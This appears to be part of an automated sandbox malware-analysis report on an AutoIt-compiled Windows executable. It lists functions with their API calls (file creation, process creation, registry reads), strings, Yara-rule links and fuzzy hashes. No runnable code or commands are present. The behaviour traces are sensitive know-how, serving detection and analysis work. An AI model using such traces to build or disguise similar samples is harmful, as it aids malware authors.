API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rn
API String ID: 1825951767-1071018963
Opcode ID: 2a2a460edb0afccaecba0ad5532829296af6b0790d92fca9c0dcb33cf86fa0ac
Instruction ID: d8e5dd18f24bf15179201cb726d4305c36ccba1be815061c4e8d03401dfd1445
Opcode Fuzzy Hash: 2a2a460edb0afccaecba0ad5532829296af6b0790d92fca9c0dcb33cf86fa0ac
Instruction Fuzzy Hash: 5BA14C71900A3D9ACB54EBA0EC91AEEB77ABF55300F44042EF516B7291EF745A08CF64

Function 0062F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00640162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00640193
Part of subcall function 00640162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0064019B
Part of subcall function 00640162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006401A6
Part of subcall function 00640162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006401B1
Part of subcall function 00640162: MapVirtualKeyW.USER32(00000011,00000000), ref: 006401B9
Part of subcall function 00640162: MapVirtualKeyW.USER32(00000012,00000000), ref: 006401C1

Part of subcall function 006360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0062F930), ref: 00636154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0062F9CD
OleInitialize.OLE32(00000000), ref: 0062FA4A
CloseHandle.KERNEL32(00000000), ref: 006645C8

Strings

%k, xrefs: 0062F796, 0062F7A8, 0062F96E, 0062FA51
Sn, xrefs: 0062F7EB
<Wn, xrefs: 0062F930
\Tn, xrefs: 0062F7F7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <Wn$\Tn$%k$Sn
API String ID: 1986988660-1588569866
Opcode ID: b1122a4e84dc8b6af4d23052cf9d3e06f35b87752beab293fb4216fd3461bfcf
Instruction ID: 5de141e906b1b270f3b52c5edf49d1845d4c3e8dc2e3fcdd16cd8899afea3c49
Opcode Fuzzy Hash: b1122a4e84dc8b6af4d23052cf9d3e06f35b87752beab293fb4216fd3461bfcf
Instruction Fuzzy Hash: 5881ADB0911BC1CFC784EF29A984A597BE7FB9830E750A12ED11BCF2A1EB7044858F55

Function 016ADBD0 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 016ADC15

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: d6b46d5bb2fb8808f25411e1f99dc50484a24f91bf26f2f1ad50e32655db2539
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 3D510A76A10248FBEF20DFF4CC49FDE7B79AF48701F508554F60AEA280DA749A458B64

Function 006239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00623A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623A24
ShowWindow.USER32(00000000,?,?), ref: 00623A38
ShowWindow.USER32(00000000,?,?), ref: 00623A41

Strings

edit, xrefs: 00623A1E
AutoIt v3, xrefs: 006239FB, 00623A00, 00623A01

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 7eba9eb3f5ccb48ddede60270728117a73b40f8590bd542b1aae058c9ad902d1
Instruction ID: a7f7beaa681723e6ff8a2e73507c85bf4ff28ab585a4037e8848deda1dbe9cfc
Opcode Fuzzy Hash: 7eba9eb3f5ccb48ddede60270728117a73b40f8590bd542b1aae058c9ad902d1
Instruction Fuzzy Hash: 0AF01770600390BEEB206B63AC88E6B3E7ED7C7F54B00102ABB01AA1B1C2611840CAB1

Function 0062407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0065D3D7

Part of subcall function 00627BCC: _memmove.LIBCMT ref: 00627C06

_memset.LIBCMT ref: 006240FC
_wcscpy.LIBCMT ref: 00624150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00624160

Strings

Line: , xrefs: 0065D400

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 7dda559bafa35a06070f16c4f5390f374934f3062cf10ae546dc0172dce0838b
Instruction ID: a6be69154d49189a7ca9818ca15e909444502217fe4cbb2a32e288f86be9ddac
Opcode Fuzzy Hash: 7dda559bafa35a06070f16c4f5390f374934f3062cf10ae546dc0172dce0838b
Instruction Fuzzy Hash: 5331CF31008B55AED760EB60EC86FDB77DAAF44304F10491EF686961A1DF70A648CF8B

Function 0064541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0064547B
_memcpy_s.LIBCMT ref: 006454ED
__read_nolock.LIBCMT ref: 0064554B
__filbuf.LIBCMT ref: 0064556E
_memset.LIBCMT ref: 006455B2

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 26e98994ce1d03fc4fddb8e84ce4f37b91b13ac5989830b873261ffbfab86d04
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: A451B570A00B05DBDB289FA9D8806BE77A7AF41321F24872DF8269A3D2D7709D518B40

Function 0062686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00624DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624E0F

_free.LIBCMT ref: 0065E263
_free.LIBCMT ref: 0065E2AA

Part of subcall function 00626A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00626BAD

Strings

Bad directive syntax error, xrefs: 0065E292
>>>AUTOIT SCRIPT<<<, xrefs: 0065E039

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 33dbd1d9641714952f15ad8aa9088d5f9b3581a463a7f81ff6bcc74a31d34f01
Instruction ID: 753dfe03ce17015be5f82c0ac779467fe866167f0097b8e6315cf11a5997be30
Opcode Fuzzy Hash: 33dbd1d9641714952f15ad8aa9088d5f9b3581a463a7f81ff6bcc74a31d34f01
Instruction Fuzzy Hash: 35917C719006299FCF18EFA4DC819EDB7B6BF09310F10442EF816AB2A1DB759A15CF54

Function 016AF6E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160fileCOMMON

Download Yara Rule

APIs

Part of subcall function 016AF5D0: Sleep.KERNELBASE(000001F4), ref: 016AF5E1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 016AF82D

Strings

77FFT9RZRPWJZEBA2N, xrefs: 016AF8AD, 016AF8B0

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: CreateFileSleep
String ID: 77FFT9RZRPWJZEBA2N
API String ID: 2694422964-4231549130
Opcode ID: c43090697733e911e68239a84902791d25f2c75b1f54161c295a5baad4709809
Instruction ID: 1e537424b3c8cc0f7cf3d3de871765536c4c093ad423ce5a0273d397955cbc61
Opcode Fuzzy Hash: c43090697733e911e68239a84902791d25f2c75b1f54161c295a5baad4709809
Instruction Fuzzy Hash: 24619130E14258DBEF11DBB4C854BEEBBB5AF18300F004598E248BB2C1D7BA5E45CB66

Function 006235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006235A1,SwapMouseButtons,00000004,?), ref: 006235D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006235A1,SwapMouseButtons,00000004,?,?,?,?,00622754), ref: 006235F5
RegCloseKey.KERNELBASE(00000000,?,?,006235A1,SwapMouseButtons,00000004,?,?,?,?,00622754), ref: 00623617

Strings

Control Panel\Mouse, xrefs: 006235D2

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: fc5f1fcb132bca16bad12ac881556eb961d392402bf4d1f4ba9d32e19fa31037
Instruction ID: 4b2f9c9a7873933a64a06338a8652e5240d6d838875a4134420fa81ebffb05ff
Opcode Fuzzy Hash: fc5f1fcb132bca16bad12ac881556eb961d392402bf4d1f4ba9d32e19fa31037
Instruction Fuzzy Hash: CC114871610628BFDB209FA4EC40AEEB7BEEF05740F015469E805D7310E371AE409B60

Function 0068955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00624EE5: _fseek.LIBCMT ref: 00624EFD

Part of subcall function 00689734: _wcscmp.LIBCMT ref: 00689824
Part of subcall function 00689734: _wcscmp.LIBCMT ref: 00689837

_free.LIBCMT ref: 006896A2
_free.LIBCMT ref: 006896A9
_free.LIBCMT ref: 00689714

Part of subcall function 00642D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00649A24), ref: 00642D69
Part of subcall function 00642D55: GetLastError.KERNEL32(00000000,?,00649A24), ref: 00642D7B

_free.LIBCMT ref: 0068971C

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 203ce446b8c6ae054de069cf6062cf0d3dacfde601e89f8990f01956b96e6c1c
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: AF5160B1D04218AFDF649F64DC81AAEBB7AEF88300F14059EF209A3341DB715A80CF58

Function 0064470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006447A0
__flush.LIBCMT ref: 006447C0
__write.LIBCMT ref: 006447F3
__flsbuf.LIBCMT ref: 00644821

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 930072b85efa6918722c0237b0a3d8508de926c50efee07a5ab237e07a604f43
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 3841A175A006459FDB188F69C882BEE7BA7AF42364B24857DE81587640EF70DD42CB44

Function 00624C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00624CBA

Strings

AU3!P/k, xrefs: 00624CB4
EA06, xrefs: 0065D8CC

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/k$EA06
API String ID: 4104443479-947634993
Opcode ID: b72f349a427c7ebbd38cca18b90c105058be34276db18250eea9ecabbec9d02c
Instruction ID: bbd69b95f2385a23fca851b9c0a40a4cfe5edac4177bed78f64de250fec821fc
Opcode Fuzzy Hash: b72f349a427c7ebbd38cca18b90c105058be34276db18250eea9ecabbec9d02c
Instruction Fuzzy Hash: 13415C21A04A7857DF219B64FC917FE7FA39F45300F684869EC82DB386DE209D458FA1

Function 00627285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065EA39
GetOpenFileNameW.COMDLG32(?), ref: 0065EA83

Part of subcall function 00624750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00624743,?,?,006237AE,?), ref: 00624770

Part of subcall function 00640791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006407B0

Strings

X, xrefs: 0065EA51

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: afd0a07a78ccdad7dae6645ff7a1b22f33c26884fc7b4700734c63f7c1b70f71
Instruction ID: 7223d76f4e260748eb2ef57113335aa81b98074f1e48c8fa6784dc30d098f325
Opcode Fuzzy Hash: afd0a07a78ccdad7dae6645ff7a1b22f33c26884fc7b4700734c63f7c1b70f71
Instruction Fuzzy Hash: 0621C070A006589FDF419F94D845BEE7BFAAF49315F00401AE908AB341DBB45A898FA6

Function 00688D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00688DAC
__fread_nolock.LIBCMT ref: 00688DC1

Strings

EA06, xrefs: 00688DF3

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 78b77a54c0c916a178c33c9a6b6e43debc8199cce319ba48da43795c3daaa769
Instruction ID: 1631917c82f700ff4d183aa04757521ece419ad99e2c254eaeda88a9d19a5d03
Opcode Fuzzy Hash: 78b77a54c0c916a178c33c9a6b6e43debc8199cce319ba48da43795c3daaa769
Instruction Fuzzy Hash: 1801F971C042187FDB58DBA8C816EFE7BF9DF11301F00419FF552D2281E874A60487A0

Function 016AE2B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016AE2F5
ExitProcess.KERNEL32(00000000), ref: 016AE314

Strings

D, xrefs: 016AE2C1

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: c9c281cf90531dd8608ad70b21ee559cf6f403318f8e9ba04dcbdb0c2bd71b5b
Instruction ID: 64e5d22484f87264026de8ab8a810aadcf8f43bd3496836d5b7a4821482ae8d8
Opcode Fuzzy Hash: c9c281cf90531dd8608ad70b21ee559cf6f403318f8e9ba04dcbdb0c2bd71b5b
Instruction Fuzzy Hash: 96F0FF7554024CABDB60DFE4CC49FEE777CBF04701F448548FB0A9A180EB759A088B61

Function 006898E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 006898F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0068990F

Strings

aut, xrefs: 00689909

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bd3ee589cd398703f922f6789bf9c278881f5c03abd2eca070276a6ea4397805
Instruction ID: e1d2b9debb564981ca035f608afae9db7222dfe3cc4adfca61d3b2ba2d442495
Opcode Fuzzy Hash: bd3ee589cd398703f922f6789bf9c278881f5c03abd2eca070276a6ea4397805
Instruction Fuzzy Hash: 91D05B7594030D6BDB50ABD0DC0DFD6773DD704701F0002B1BA5491191D97066548F91

Function 0069CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35159fbf90d438a7faf24d937048ea87865be3eae58881397e2c6bf32e46825c
Instruction ID: aea5431b28631a96d4ef8274c847f3412798afcec9c31766f8bcf5cc13f01af2
Opcode Fuzzy Hash: 35159fbf90d438a7faf24d937048ea87865be3eae58881397e2c6bf32e46825c
Instruction Fuzzy Hash: B5F14E716087019FCB54DF28C48096ABBEAFF89324F54892EF8999B351D730E945CF92

Function 0062434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00624370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00624415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00624432

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 996159dbc1dd275f799f0c5fa0b167a1bb7a54a406a0ca06eae7b33cc687d488
Instruction ID: 356b029bf32afa71db83a8683f18bee543af054ed971620656965daf156ba5b5
Opcode Fuzzy Hash: 996159dbc1dd275f799f0c5fa0b167a1bb7a54a406a0ca06eae7b33cc687d488
Instruction Fuzzy Hash: 5F319370505B118FD720EF24E8846DBBBF9FB48308F00092EF69A86351DB70A944CF52

Function 0064571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00645733

Part of subcall function 0064A16B: __NMSG_WRITE.LIBCMT ref: 0064A192
Part of subcall function 0064A16B: __NMSG_WRITE.LIBCMT ref: 0064A19C

__NMSG_WRITE.LIBCMT ref: 0064573A

Part of subcall function 0064A1C8: GetModuleFileNameW.KERNEL32(00000000,006E33BA,00000104,?,00000001,00000000), ref: 0064A25A
Part of subcall function 0064A1C8: ___crtMessageBoxW.LIBCMT ref: 0064A308

Part of subcall function 0064309F: ___crtCorExitProcess.LIBCMT ref: 006430A5
Part of subcall function 0064309F: ExitProcess.KERNEL32 ref: 006430AE

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

RtlAllocateHeap.NTDLL(01660000,00000000,00000001,00000000,?,?,?,00640DD3,?), ref: 0064575F

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
